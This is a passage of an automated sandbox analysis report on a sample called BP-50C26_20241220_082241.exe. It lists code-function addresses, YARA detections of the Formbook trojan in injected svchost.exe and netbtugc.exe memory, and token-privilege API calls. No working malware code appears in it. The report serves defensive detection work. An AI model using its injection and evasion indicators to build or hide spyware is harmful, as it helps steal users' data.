            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA3522_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036003E62_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F02_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E02742_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C02C02_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C81582_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA1182_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035301002_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F81CC2_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036001AA2_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F41A22_2_035F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D20002_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035647502_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035407702_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C02_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C6E02_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035405352_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036005912_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F24462_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E44202_2_035E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EE4F62_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB402_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F6BD72_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA802_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035569622_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360A9A62_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A02_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354A8402_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035428402_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E8F02_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035268B82_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F402_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560F302_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E2F302_2_035E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03582F282_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC82_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354CFE02_2_0354CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BEFA02_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540E592_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEE262_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEEDB2_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552E902_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FCE932_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DCD1F2_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354AD002_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353ADE02_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03558DBF2_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540C002_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530CF22_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0CB52_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352D34C2_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F132D2_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0358739A2_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B2C02_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E12ED2_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035452A02_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360B16B2_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352F1722_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357516C2_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354B1B02_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EF0CC2_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035470C02_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F70E92_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF0E02_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF7B02_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035856302_2_03585630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F16CC2_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F75712_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036095C32_2_036095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DD5B02_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035314602_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF43F2_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFB762_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B5BF02_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357DBF92_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FB802_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFA492_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7A462_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B3A6C2_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EDAC62_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DDAAC2_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03585AA02_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E1AA32_2_035E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035499502_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B9502_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D59102_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AD8002_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035438E02_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFF092_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03503FD22_2_03503FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03503FD52_2_03503FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03541F922_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFFB12_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03549EB02_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F1D5A2_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03543D402_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7D732_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FDC02_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B9C322_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFCF22_2_035FFCF2
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F08BC43_2_02F08BC4
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F263C43_2_02F263C4
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F08BBB3_2_02F08BBB
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F0F4E23_2_02F0F4E2
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F0F4E43_2_02F0F4E4
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exeCode function: 3_2_02F08DE43_2_02F08DE4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317A3524_2_0317A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030CE3F04_2_030CE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031803E64_2_031803E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031602744_2_03160274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031402C04_2_031402C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030B01004_2_030B0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315A1184_2_0315A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031481584_2_03148158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031801AA4_2_031801AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031741A24_2_031741A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031781CC4_2_031781CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031520004_2_03152000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030E47504_2_030E4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C07704_2_030C0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030BC7C04_2_030BC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030DC6E04_2_030DC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C05354_2_030C0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031805914_2_03180591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031644204_2_03164420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031724464_2_03172446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0316E4F64_2_0316E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317AB404_2_0317AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03176BD74_2_03176BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030BEA804_2_030BEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030D69624_2_030D6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C29A04_2_030C29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0318A9A64_2_0318A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030CA8404_2_030CA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C28404_2_030C2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030A68B84_2_030A68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030EE8F04_2_030EE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03162F304_2_03162F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03102F284_2_03102F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030E0F304_2_030E0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03134F404_2_03134F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0313EFA04_2_0313EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030B2FC84_2_030B2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030CCFE04_2_030CCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317EE264_2_0317EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C0E594_2_030C0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317CE934_2_0317CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030D2E904_2_030D2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317EEDB4_2_0317EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315CD1F4_2_0315CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030CAD004_2_030CAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030D8DBF4_2_030D8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030BADE04_2_030BADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C0C004_2_030C0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03160CB54_2_03160CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030B0CF24_2_030B0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317132D4_2_0317132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030AD34C4_2_030AD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0310739A4_2_0310739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C52A04_2_030C52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030DB2C04_2_030DB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031612ED4_2_031612ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030F516C4_2_030F516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0318B16B4_2_0318B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030AF1724_2_030AF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030CB1B04_2_030CB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C70C04_2_030C70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0316F0CC4_2_0316F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317F0E04_2_0317F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031770E94_2_031770E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317F7B04_2_0317F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031056304_2_03105630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031716CC4_2_031716CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031775714_2_03177571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315D5B04_2_0315D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031895C34_2_031895C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317F43F4_2_0317F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030B14604_2_030B1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317FB764_2_0317FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030DFB804_2_030DFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03135BF04_2_03135BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030FDBF94_2_030FDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03177A464_2_03177A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317FA494_2_0317FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03133A6C4_2_03133A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03105AA04_2_03105AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03161AA34_2_03161AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315DAAC4_2_0315DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0316DAC64_2_0316DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031559104_2_03155910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C99504_2_030C9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030DB9504_2_030DB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0312D8004_2_0312D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C38E04_2_030C38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317FF094_2_0317FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C1F924_2_030C1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317FFB14_2_0317FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C9EB04_2_030C9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030C3D404_2_030C3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03171D5A4_2_03171D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03177D734_2_03177D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030DFDC04_2_030DFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03139C324_2_03139C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317FCF24_2_0317FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_028115E04_2_028115E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0280C7C74_2_0280C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0280C7D04_2_0280C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0280AA704_2_0280AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0280C9F04_2_0280C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_028130EE4_2_028130EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_028130F04_2_028130F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02829FD04_2_02829FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBA0AF4_2_02DBA0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBB8B44_2_02DBB8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBB9D64_2_02DBB9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBADD84_2_02DBADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBBD6C4_2_02DBBD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: String function: 00C19CB3 appears 31 times
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: String function: 00C30A30 appears 46 times
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: String function: 00C2F9F2 appears 40 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0313F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 030AB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03107E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 030F5130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0312EA12 appears 86 times
            Source: BP-50C26_20241220_082241.exe, 00000000.00000003.2040573608.0000000004003000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BP-50C26_20241220_082241.exe
            Source: BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.00000000041AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BP-50C26_20241220_082241.exe
            Source: BP-50C26_20241220_082241.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/7
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C837B5 GetLastError,FormatMessageW,0_2_00C837B5
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C710BF AdjustTokenPrivileges,CloseHandle,0_2_00C710BF
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C716C3
